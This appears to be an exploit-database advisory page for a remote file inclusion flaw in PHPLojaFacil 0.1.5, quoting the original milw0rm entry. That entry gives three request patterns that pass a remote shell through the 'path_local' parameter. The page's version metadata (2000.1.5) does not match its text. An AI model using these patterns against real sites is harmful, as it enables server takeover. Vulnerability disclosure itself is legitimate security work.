header-logo
Suggest Exploit
vendor:
PHPLojaFacil
by:
GolD_M
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: PHPLojaFacil
Affected Version From: 2000.1.5
Affected Version To: 2000.1.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHPLojaFacil 0.1.5 (path_local) Remote File Inclusion Vulnerabilities

The PHPLojaFacil version 0.1.5 is vulnerable to remote file inclusion attacks. The 'path_local' parameter in the 'ftp.php', 'db.php', and 'ftp.php' files can be manipulated to include arbitrary files from remote servers.

Mitigation:

The vendor should release a patch to sanitize user input in the 'path_local' parameter and prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

# PHPLojaFacil 0.1.5 (path_local) Remote File Inclusion Vulnerabilities
# D.Script: http://www.crieseuwebsite.com/php/download.php?categoria=E-Commerce&arquivo=24
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/ftp.php?path_local=Shell
# Exploit:[Path]/libs/db.php?path_local=Shell
# Exploit:[Path]/libs/ftp.php?path_local=Shell
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-08]

Navigation

Suggest Exploit

Services By CQR